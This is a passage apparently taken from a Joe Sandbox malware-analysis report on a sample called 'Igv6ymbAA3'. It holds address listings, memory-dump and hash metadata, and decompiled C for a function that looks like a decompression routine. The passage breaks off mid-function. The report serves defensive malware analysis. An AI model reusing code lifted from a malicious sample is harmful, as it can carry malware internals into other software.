                                                                                                                                                                      0x00408260
                                                                                                                                                                      0x00408259
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040829a
                                                                                                                                                                      0x0040829a
                                                                                                                                                                      0x004082a2
                                                                                                                                                                      0x004082a5
                                                                                                                                                                      0x004082a7
                                                                                                                                                                      0x004082a9
                                                                                                                                                                      0x004082ac
                                                                                                                                                                      0x004082b1
                                                                                                                                                                      0x004082b4
                                                                                                                                                                      0x004082b7
                                                                                                                                                                      0x004082bd
                                                                                                                                                                      0x004082fe
                                                                                                                                                                      0x00408300
                                                                                                                                                                      0x004083be
                                                                                                                                                                      0x004083c0
                                                                                                                                                                      0x004083c3
                                                                                                                                                                      0x004083c6
                                                                                                                                                                      0x004083c8
                                                                                                                                                                      0x004083ca
                                                                                                                                                                      0x004083d0
                                                                                                                                                                      0x004083e2
                                                                                                                                                                      0x004083e4
                                                                                                                                                                      0x004083e7
                                                                                                                                                                      0x004083ea
                                                                                                                                                                      0x004083ed
                                                                                                                                                                      0x004083f0
                                                                                                                                                                      0x004083f3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004083d2
                                                                                                                                                                      0x004083d2
                                                                                                                                                                      0x004083d6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004083d6
                                                                                                                                                                      0x00408306
                                                                                                                                                                      0x00408308
                                                                                                                                                                      0x0040830b
                                                                                                                                                                      0x0040830f
                                                                                                                                                                      0x00408312
                                                                                                                                                                      0x00408319
                                                                                                                                                                      0x0040831d
                                                                                                                                                                      0x00408326
                                                                                                                                                                      0x00408328
                                                                                                                                                                      0x0040832d
                                                                                                                                                                      0x0040832f
                                                                                                                                                                      0x00408335
                                                                                                                                                                      0x00408338
                                                                                                                                                                      0x0040833a
                                                                                                                                                                      0x0040833c
                                                                                                                                                                      0x0040833f
                                                                                                                                                                      0x00408342
                                                                                                                                                                      0x00408347
                                                                                                                                                                      0x0040834e
                                                                                                                                                                      0x00408351
                                                                                                                                                                      0x00408355
                                                                                                                                                                      0x004083b1
                                                                                                                                                                      0x004083b1
                                                                                                                                                                      0x004083b6
                                                                                                                                                                      0x004083ba
                                                                                                                                                                      0x004083bc
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408357
                                                                                                                                                                      0x00408357
                                                                                                                                                                      0x0040835f
                                                                                                                                                                      0x00408363
                                                                                                                                                                      0x00408365
                                                                                                                                                                      0x00408367
                                                                                                                                                                      0x0040836b
                                                                                                                                                                      0x0040836c
                                                                                                                                                                      0x0040836f
                                                                                                                                                                      0x00408371
                                                                                                                                                                      0x00408374
                                                                                                                                                                      0x0040837b
                                                                                                                                                                      0x00408382
                                                                                                                                                                      0x00408384
                                                                                                                                                                      0x00408388
                                                                                                                                                                      0x00408389
                                                                                                                                                                      0x0040838e
                                                                                                                                                                      0x00408390
                                                                                                                                                                      0x00408392
                                                                                                                                                                      0x00408397
                                                                                                                                                                      0x00408399
                                                                                                                                                                      0x0040839c
                                                                                                                                                                      0x0040839f
                                                                                                                                                                      0x004083a6
                                                                                                                                                                      0x004083a9
                                                                                                                                                                      0x004083af
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004083af
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408357
                                                                                                                                                                      0x00408355
                                                                                                                                                                      0x004082c0
                                                                                                                                                                      0x004082c0
                                                                                                                                                                      0x004082c8
                                                                                                                                                                      0x004082cc
                                                                                                                                                                      0x004082ce
                                                                                                                                                                      0x004082d0
                                                                                                                                                                      0x004082d3
                                                                                                                                                                      0x004082d4
                                                                                                                                                                      0x004082d7
                                                                                                                                                                      0x004082de
                                                                                                                                                                      0x004082e0
                                                                                                                                                                      0x004082e3
                                                                                                                                                                      0x004082e4
                                                                                                                                                                      0x004082e9
                                                                                                                                                                      0x004082eb
                                                                                                                                                                      0x004082f0
                                                                                                                                                                      0x004082f3
                                                                                                                                                                      0x004082f6
                                                                                                                                                                      0x004082fc
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004082fc
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004082c0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004083f9
                                                                                                                                                                      0x004083f9
                                                                                                                                                                      0x004083fe
                                                                                                                                                                      0x00408438
                                                                                                                                                                      0x0040843b
                                                                                                                                                                      0x0040843f
                                                                                                                                                                      0x00408446
                                                                                                                                                                      0x00408458
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408448
                                                                                                                                                                      0x00408448
                                                                                                                                                                      0x0040844c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040844c
                                                                                                                                                                      0x00408400
                                                                                                                                                                      0x00408402
                                                                                                                                                                      0x00408424
                                                                                                                                                                      0x00408424
                                                                                                                                                                      0x0040842c
                                                                                                                                                                      0x0040842e
                                                                                                                                                                      0x0040842f
                                                                                                                                                                      0x00408431
                                                                                                                                                                      0x00408434
                                                                                                                                                                      0x00408436
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408404
                                                                                                                                                                      0x00408404
                                                                                                                                                                      0x0040840c
                                                                                                                                                                      0x00408410
                                                                                                                                                                      0x00408412
                                                                                                                                                                      0x00408414
                                                                                                                                                                      0x00408415
                                                                                                                                                                      0x00408418
                                                                                                                                                                      0x00408419
                                                                                                                                                                      0x0040841b
                                                                                                                                                                      0x00408422
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408422
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408404
                                                                                                                                                                      0x00408402
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040845e
                                                                                                                                                                      0x00408463
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408469
                                                                                                                                                                      0x00408469
                                                                                                                                                                      0x0040846d
                                                                                                                                                                      0x00408471
                                                                                                                                                                      0x00408476
                                                                                                                                                                      0x004084b4
                                                                                                                                                                      0x004084b8
                                                                                                                                                                      0x004084ba
                                                                                                                                                                      0x004084bd
                                                                                                                                                                      0x004084c1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408478
                                                                                                                                                                      0x00408478
                                                                                                                                                                      0x0040847a
                                                                                                                                                                      0x0040847d
                                                                                                                                                                      0x00408483
                                                                                                                                                                      0x00408498
                                                                                                                                                                      0x0040849a
                                                                                                                                                                      0x0040849d
                                                                                                                                                                      0x00408485
                                                                                                                                                                      0x00408485
                                                                                                                                                                      0x0040848a
                                                                                                                                                                      0x0040848d
                                                                                                                                                                      0x00408491
                                                                                                                                                                      0x00408491
                                                                                                                                                                      0x004084a1
                                                                                                                                                                      0x004084a5
                                                                                                                                                                      0x004084a8
                                                                                                                                                                      0x004084ae
                                                                                                                                                                      0x004084b0
                                                                                                                                                                      0x004084c5
                                                                                                                                                                      0x004084c5
                                                                                                                                                                      0x004084c5
                                                                                                                                                                      0x004084ae
                                                                                                                                                                      0x004084c9
                                                                                                                                                                      0x004084cf
                                                                                                                                                                      0x004084d1
                                                                                                                                                                      0x004084d3
                                                                                                                                                                      0x004084d3
                                                                                                                                                                      0x004084d9
                                                                                                                                                                      0x004084dd
                                                                                                                                                                      0x004084e1
                                                                                                                                                                      0x004084e3
                                                                                                                                                                      0x004084e7
                                                                                                                                                                      0x004084f0
                                                                                                                                                                      0x004084f0
                                                                                                                                                                      0x004084f4
                                                                                                                                                                      0x004084f6
                                                                                                                                                                      0x004084fa
                                                                                                                                                                      0x004084fc
                                                                                                                                                                      0x004084fd
                                                                                                                                                                      0x004084fd
                                                                                                                                                                      0x004084fd
                                                                                                                                                                      0x00408508
                                                                                                                                                                      0x0040850c
                                                                                                                                                                      0x00408512
                                                                                                                                                                      0x00408512
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040850c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408522
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408528
                                                                                                                                                                      0x00408528
                                                                                                                                                                      0x0040852c
                                                                                                                                                                      0x0040852f
                                                                                                                                                                      0x00408531
                                                                                                                                                                      0x00408532
                                                                                                                                                                      0x00408536
                                                                                                                                                                      0x0040853a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040853a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408549
                                                                                                                                                                      0x00408606
                                                                                                                                                                      0x00408606
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040854f
                                                                                                                                                                      0x00408552
                                                                                                                                                                      0x00408574
                                                                                                                                                                      0x00408574
                                                                                                                                                                      0x00408578
                                                                                                                                                                      0x0040857c
                                                                                                                                                                      0x00408580
                                                                                                                                                                      0x00408583
                                                                                                                                                                      0x00408586
                                                                                                                                                                      0x0040858c
                                                                                                                                                                      0x0040858e
                                                                                                                                                                      0x00408592
                                                                                                                                                                      0x00408595
                                                                                                                                                                      0x0040859c
                                                                                                                                                                      0x0040859d
                                                                                                                                                                      0x0040859e
                                                                                                                                                                      0x004085a7
                                                                                                                                                                      0x004085a0
                                                                                                                                                                      0x004085a0
                                                                                                                                                                      0x004085a0
                                                                                                                                                                      0x004085ac
                                                                                                                                                                      0x004085b0
                                                                                                                                                                      0x004085b4
                                                                                                                                                                      0x004085b7
                                                                                                                                                                      0x004085ba
                                                                                                                                                                      0x004085ba
                                                                                                                                                                      0x004085c1
                                                                                                                                                                      0x004085c5
                                                                                                                                                                      0x004085c9
                                                                                                                                                                      0x004085cb
                                                                                                                                                                      0x004085cd
                                                                                                                                                                      0x004085d4
                                                                                                                                                                      0x004085d7
                                                                                                                                                                      0x004085db
                                                                                                                                                                      0x004085de
                                                                                                                                                                      0x004085e4
                                                                                                                                                                      0x004085e7
                                                                                                                                                                      0x004085eb
                                                                                                                                                                      0x004085ee
                                                                                                                                                                      0x004085ee
                                                                                                                                                                      0x004085f3
                                                                                                                                                                      0x00408602
                                                                                                                                                                      0x00408604
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004085f5
                                                                                                                                                                      0x004085f5
                                                                                                                                                                      0x004085f9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004085f9
                                                                                                                                                                      0x00408554
                                                                                                                                                                      0x00408554
                                                                                                                                                                      0x0040855c
                                                                                                                                                                      0x00408560
                                                                                                                                                                      0x00408562
                                                                                                                                                                      0x00408564
                                                                                                                                                                      0x00408565
                                                                                                                                                                      0x00408568
                                                                                                                                                                      0x00408569
                                                                                                                                                                      0x0040856b
                                                                                                                                                                      0x00408572
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408572
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408554
                                                                                                                                                                      0x00408552
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040860c
                                                                                                                                                                      0x00408610
                                                                                                                                                                      0x004086a1
                                                                                                                                                                      0x004086a1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408620
                                                                                                                                                                      0x00408623
                                                                                                                                                                      0x00408645
                                                                                                                                                                      0x00408648
                                                                                                                                                                      0x0040869d
                                                                                                                                                                      0x0040869f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040864a
                                                                                                                                                                      0x0040864a
                                                                                                                                                                      0x0040864e
                                                                                                                                                                      0x00408655
                                                                                                                                                                      0x00408655
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408655
                                                                                                                                                                      0x00408625
                                                                                                                                                                      0x00408625
                                                                                                                                                                      0x0040862d
                                                                                                                                                                      0x00408631
                                                                                                                                                                      0x00408633
                                                                                                                                                                      0x00408635
                                                                                                                                                                      0x00408636
                                                                                                                                                                      0x00408639
                                                                                                                                                                      0x0040863a
                                                                                                                                                                      0x0040863c
                                                                                                                                                                      0x00408643
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408643
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408625
                                                                                                                                                                      0x00408623
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004086a7
                                                                                                                                                                      0x004086a7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004086b1
                                                                                                                                                                      0x004086b9
                                                                                                                                                                      0x004086b9
                                                                                                                                                                      0x004086c1
                                                                                                                                                                      0x004086c8
                                                                                                                                                                      0x004086cb
                                                                                                                                                                      0x004086cd
                                                                                                                                                                      0x004086d4
                                                                                                                                                                      0x004086d7
                                                                                                                                                                      0x004086da
                                                                                                                                                                      0x004086f9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004086fb
                                                                                                                                                                      0x004086fb
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004086fb
                                                                                                                                                                      0x0040870e
                                                                                                                                                                      0x0040870e
                                                                                                                                                                      0x0040870e
                                                                                                                                                                      0x00408716
                                                                                                                                                                      0x0040871d
                                                                                                                                                                      0x00408720
                                                                                                                                                                      0x00408723
                                                                                                                                                                      0x00408726
                                                                                                                                                                      0x0040872d
                                                                                                                                                                      0x00408737
                                                                                                                                                                      0x00408738
                                                                                                                                                                      0x00408753
                                                                                                                                                                      0x00408754
                                                                                                                                                                      0x00408755
                                                                                                                                                                      0x0040873a
                                                                                                                                                                      0x00408742
                                                                                                                                                                      0x00408743
                                                                                                                                                                      0x00408744
                                                                                                                                                                      0x00408744
                                                                                                                                                                      0x0040875a
                                                                                                                                                                      0x0040875d
                                                                                                                                                                      0x00408760
                                                                                                                                                                      0x00408760
                                                                                                                                                                      0x00408768
                                                                                                                                                                      0x00408780
                                                                                                                                                                      0x00408785
                                                                                                                                                                      0x00408790
                                                                                                                                                                      0x004087b6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408792
                                                                                                                                                                      0x00408792
                                                                                                                                                                      0x00408792
                                                                                                                                                                      0x00408798
                                                                                                                                                                      0x0040866b
                                                                                                                                                                      0x00408672
                                                                                                                                                                      0x0040879e
                                                                                                                                                                      0x004087aa
                                                                                                                                                                      0x004087aa
                                                                                                                                                                      0x00408798
                                                                                                                                                                      0x00408785
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00408701
                                                                                                                                                                      0x0040870d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040865b
                                                                                                                                                                      0x0040865b
                                                                                                                                                                      0x0040865d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00407420
                                                                                                                                                                      0x00407414
                                                                                                                                                                      0x004073b5
                                                                                                                                                                      0x00000000

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                      • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                                                                                                                                      • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 024177D9 Relevance: .4, Instructions: 419COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 53fd915c455bc613e875872949079b38185adfdf937e690afefee85b57ad4f6d
                                                                                                                                                                      • Instruction ID: 151205387db0e89849304722303adee01a49877dc824bf02cbbf6f26734358e4
                                                                                                                                                                      • Opcode Fuzzy Hash: 53fd915c455bc613e875872949079b38185adfdf937e690afefee85b57ad4f6d
                                                                                                                                                                      • Instruction Fuzzy Hash: A2F14D746047429FE308CF29C494A6BF7E2BF88308F144A2EE8958B781D774E955CBD6
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00406CA0 Relevance: .4, Instructions: 401COMMONCrypto
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00406CA0() {
				intOrPtr _t153;
				unsigned int _t157;
				unsigned int _t160;
				intOrPtr _t172;
				signed int _t174;
				signed char _t180;
				signed int _t181;
				void* _t183;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				intOrPtr _t190;
				unsigned int _t192;
				char _t198;
				char _t199;
				char _t202;
				unsigned int _t217;
				intOrPtr* _t221;
				intOrPtr _t222;
				signed char _t230;
				intOrPtr* _t232;
				signed char _t237;
				unsigned int _t245;
				intOrPtr _t248;
				intOrPtr _t249;
				void* _t250;
				void* _t251;
				void* _t252;
				signed char _t263;
				signed char _t269;
				signed int _t280;
				signed int _t284;
				intOrPtr _t285;
				signed char _t288;
				signed char _t290;
				unsigned int _t297;
				char _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t318;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				char* _t331;
				char* _t333;
				char* _t334;
				char* _t335;
				signed char* _t337;
				void* _t341;
				unsigned int _t342;
				void* _t345;
				void* _t346;
				intOrPtr _t347;
				signed char* _t348;
				void* _t349;

				_t221 =  *((intOrPtr*)(_t349 + 0x50));
				_t153 =  *((intOrPtr*)(_t221 + 0x1c));
				_t217 =  *(_t153 + 0x38);
				_t337 =  *_t221 - 1;
				 *((intOrPtr*)(_t349 + 0x14)) =  *((intOrPtr*)(_t221 + 4)) + _t337 - 5;
				_t222 =  *((intOrPtr*)(_t221 + 0x10));
				_t331 =  *((intOrPtr*)(_t221 + 0xc)) - 1;
				 *((intOrPtr*)(_t349 + 0x38)) = _t222 -  *(_t349 + 0x54) + _t331;
				 *((intOrPtr*)(_t349 + 0x2c)) = _t222 + _t331 - 0x101;
				 *((intOrPtr*)(_t349 + 0x28)) =  *((intOrPtr*)(_t153 + 0x28));
				 *((intOrPtr*)(_t349 + 0x3c)) =  *((intOrPtr*)(_t153 + 0x2c));
				 *((intOrPtr*)(_t349 + 0x44)) =  *((intOrPtr*)(_t153 + 0x30));
				 *((intOrPtr*)(_t349 + 0x40)) =  *((intOrPtr*)(_t153 + 0x34));
				 *((intOrPtr*)(_t349 + 0x20)) =  *((intOrPtr*)(_t153 + 0x4c));
				 *((intOrPtr*)(_t349 + 0x24)) =  *((intOrPtr*)(_t153 + 0x50));
				 *((intOrPtr*)(_t349 + 0x18)) = _t153;
				_t326 =  *(_t153 + 0x3c);
				 *(_t349 + 0x54) = 1;
				_t280 = (1 <<  *(_t153 + 0x54)) - 1;
				 *(_t349 + 0x10) = _t337;
				 *(_t349 + 0x48) = 1;
				 *(_t349 + 0x30) = ( *(_t349 + 0x54) <<  *(_t153 + 0x58)) - 1;
				L1:
				while(1) {
					if(_t326 < 0xf) {
						_t174 = (_t337[1] & 0x000000ff) << _t326;
						_t337 =  &(_t337[2]);
						_t329 = _t326 + 8;
						 *(_t349 + 0x10) = _t337;
						_t217 = _t217 + _t174 + (( *_t337 & 0x000000ff) << _t329);
						_t326 = _t329 + 8;
					}
					_t157 =  *( *((intOrPtr*)(_t349 + 0x20)) + (_t280 & _t217) * 4);
					_t230 = _t157 >> 0x00000008 & 0x000000ff;
					_t284 = _t157 & 0x000000ff;
					_t217 = _t217 >> _t230;
					_t326 = _t326 - _t230;
					if(_t284 == 0) {
						L7:
						_t331 = _t331 + 1;
						 *_t331 = _t157 >> 0x10;
						L46:
						_t285 =  *((intOrPtr*)(_t349 + 0x14));
						if(_t337 >= _t285 || _t331 >=  *((intOrPtr*)(_t349 + 0x2c))) {
							L59:
							_t160 = _t326 >> 3;
							_t338 = _t337 - _t160;
							_t327 = _t326 - _t160 + _t160 + _t160 + _t160 + _t160 + _t160 + _t160 + _t160;
							_t232 =  *((intOrPtr*)(_t349 + 0x50));
							_t144 = _t338 + 1; // -1
							 *_t232 = _t144;
							 *((intOrPtr*)(_t232 + 0xc)) = _t331 + 1;
							 *((intOrPtr*)(_t232 + 0x10)) =  *((intOrPtr*)(_t349 + 0x2c)) - _t331 + 0x101;
							_t172 =  *((intOrPtr*)(_t349 + 0x18));
							 *((intOrPtr*)(_t232 + 4)) = _t285 - _t337 - _t160 + 5;
							 *(_t172 + 0x3c) = _t327;
							 *(_t172 + 0x38) = _t217 & (0x00000001 << _t327) - 0x00000001;
							return _t172;
						} else {
							_t280 =  *(_t349 + 0x48);
							continue;
						}
					}
					while((_t284 & 0x00000010) == 0) {
						if((_t284 & 0x00000040) != 0) {
							if((_t284 & 0x00000020) == 0) {
								L57:
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + 0x18)) = 0x41d338;
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0x1b;
								L58:
								_t285 =  *((intOrPtr*)(_t349 + 0x14));
								goto L59;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0xb;
							goto L58;
						}
						 *(_t349 + 0x54) = 1;
						_t157 =  *( *((intOrPtr*)(_t349 + 0x20)) + ((( *(_t349 + 0x54) << _t284) - 0x00000001 & _t217) + (_t157 >> 0x10)) * 4);
						_t269 = _t157 >> 0x00000008 & 0x000000ff;
						_t284 = _t157 & 0x000000ff;
						_t217 = _t217 >> _t269;
						_t326 = _t326 - _t269;
						if(_t284 != 0) {
							continue;
						}
						goto L7;
					}
					_t288 = _t284 & 0x0000000f;
					 *(_t349 + 0x54) = _t157 >> 0x10;
					if(_t288 != 0) {
						_t263 = _t288;
						 *(_t349 + 0x54) =  *(_t349 + 0x54) + ((0x00000001 << _t263) - 0x00000001 & _t217);
						_t217 = _t217 >> _t263;
						_t326 = _t326 - _t288;
					}
					if(_t326 < 0xf) {
						_t318 = _t337[1] & 0x000000ff;
						_t348 =  &(_t337[1]);
						_t337 =  &(_t348[1]);
						_t328 = _t326 + 8;
						 *(_t349 + 0x10) = _t337;
						_t217 = _t217 + (_t318 << _t326) + ((_t348[1] & 0x000000ff) << _t328);
						_t326 = _t328 + 8;
					}
					_t290 =  *( *((intOrPtr*)(_t349 + 0x24)) + ( *(_t349 + 0x30) & _t217) * 4);
					_t237 = _t290 >> 0x00000008 & 0x000000ff;
					_t180 = _t290 & 0x000000ff;
					_t217 = _t217 >> _t237;
					_t326 = _t326 - _t237;
					 *(_t349 + 0x1c) = _t290;
					if((_t180 & 0x00000010) != 0) {
						L17:
						_t181 = _t180 & 0x0000000f;
						 *(_t349 + 0x1c) = _t290 >> 0x10;
						if(_t326 < _t181) {
							_t309 = _t337[1] & 0x000000ff;
							_t337 =  &(_t337[1]);
							_t310 = _t309 << _t326;
							_t326 = _t326 + 8;
							 *(_t349 + 0x10) = _t337;
							_t217 = _t217 + _t310;
							if(_t326 < _t181) {
								_t311 = _t337[1] & 0x000000ff;
								_t337 =  &(_t337[1]);
								 *(_t349 + 0x10) = _t337;
								_t217 = _t217 + (_t311 << _t326);
								_t326 = _t326 + 8;
							}
						}
						_t326 = _t326 - _t181;
						_t297 =  *(_t349 + 0x1c) + ((0x00000001 << _t181) - 0x00000001 & _t217);
						_t183 = _t331 -  *((intOrPtr*)(_t349 + 0x38));
						_t217 = _t217 >> _t181;
						 *(_t349 + 0x1c) = _t297;
						if(_t297 <= _t183) {
							_t185 = _t331 - _t297;
							do {
								_t186 = _t185 + 1;
								 *((char*)(_t331 + 1)) =  *(_t185 + 1) & 0x000000ff;
								_t187 = _t186 + 1;
								_t333 = _t331 + 2;
								 *_t333 =  *((intOrPtr*)(_t186 + 1));
								_t185 = _t187 + 1;
								_t331 = _t333 + 1;
								 *_t331 =  *(_t187 + 1) & 0x000000ff;
								_t245 =  *(_t349 + 0x54) - 3;
								 *(_t349 + 0x54) = _t245;
							} while (_t245 > 2);
							if(_t245 != 0) {
								_t188 = _t185 + 1;
								_t331 = _t331 + 1;
								 *_t331 =  *(_t185 + 1);
								if(_t245 > 1) {
									_t331 = _t331 + 1;
									 *_t331 =  *((intOrPtr*)(_t188 + 1));
								}
							}
							goto L46;
						} else {
							_t341 = _t297 - _t183;
							if(_t341 >  *((intOrPtr*)(_t349 + 0x3c))) {
								_t337 =  *(_t349 + 0x10);
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + 0x18)) = 0x41d338;
								 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x18)))) = 0x1b;
								goto L58;
							}
							_t190 =  *((intOrPtr*)(_t349 + 0x44));
							_t248 =  *((intOrPtr*)(_t349 + 0x40)) - 1;
							 *((intOrPtr*)(_t349 + 0x34)) = _t248;
							if(_t190 != 0) {
								if(_t190 >= _t341) {
									_t249 = _t248 + _t190 - _t341;
									if(_t341 >=  *(_t349 + 0x54)) {
										L39:
										_t192 =  *(_t349 + 0x54);
										if(_t192 <= 2) {
											L42:
											_t342 =  *(_t349 + 0x54);
											if(_t342 != 0) {
												_t250 = _t249 + 1;
												_t331 = _t331 + 1;
												 *_t331 =  *(_t249 + 1);
												if(_t342 > 1) {
													_t331 = _t331 + 1;
													 *_t331 =  *((intOrPtr*)(_t250 + 1));
												}
											}
											_t337 =  *(_t349 + 0x10);
											goto L46;
										}
										_t107 = _t192 - 3; // -2
										_t345 = (0xaaaaaaab * _t107 >> 0x20 >> 1) + 1;
										do {
											 *(_t349 + 0x54) =  *(_t349 + 0x54) - 3;
											_t251 = _t249 + 1;
											_t334 = _t331 + 1;
											 *_t334 =  *(_t249 + 1) & 0x000000ff;
											_t252 = _t251 + 1;
											_t335 = _t334 + 1;
											 *_t335 =  *((intOrPtr*)(_t251 + 1));
											_t249 = _t252 + 1;
											_t331 = _t335 + 1;
											_t345 = _t345 - 1;
											 *_t331 =  *(_t252 + 1) & 0x000000ff;
										} while (_t345 != 0);
										goto L42;
									}
									 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t341;
									do {
										_t198 =  *(_t249 + 1);
										_t249 = _t249 + 1;
										_t331 = _t331 + 1;
										_t341 = _t341 - 1;
										 *_t331 = _t198;
									} while (_t341 != 0);
									L38:
									_t249 = _t331 - _t297;
									goto L39;
								}
								_t346 = _t341 - _t190;
								_t249 = _t248 + _t190 - _t341 +  *((intOrPtr*)(_t349 + 0x28));
								if(_t346 >=  *(_t349 + 0x54)) {
									goto L39;
								}
								 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t346;
								do {
									_t308 =  *(_t249 + 1);
									_t249 = _t249 + 1;
									_t331 = _t331 + 1;
									_t346 = _t346 - 1;
									 *_t331 = _t308;
								} while (_t346 != 0);
								_t249 =  *((intOrPtr*)(_t349 + 0x34));
								if(_t190 >=  *(_t349 + 0x54)) {
									goto L39;
								}
								 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t190;
								_t347 = _t190;
								do {
									_t199 =  *(_t249 + 1);
									_t249 = _t249 + 1;
									_t331 = _t331 + 1;
									_t347 = _t347 - 1;
									 *_t331 = _t199;
								} while (_t347 != 0);
								_t249 = _t331 -  *(_t349 + 0x1c);
								goto L39;
							}
							_t249 = _t248 +  *((intOrPtr*)(_t349 + 0x28)) - _t341;
							if(_t341 >=  *(_t349 + 0x54)) {
								goto L39;
							}
							 *(_t349 + 0x54) =  *(_t349 + 0x54) - _t341;
							do {
								_t202 =  *(_t249 + 1);
								_t249 = _t249 + 1;
								_t331 = _t331 + 1;
								_t341 = _t341 - 1;
								 *_t331 = _t202;
							} while (_t341 != 0);
							goto L38;
						}
					} else {
						while((_t180 & 0x00000040) == 0) {
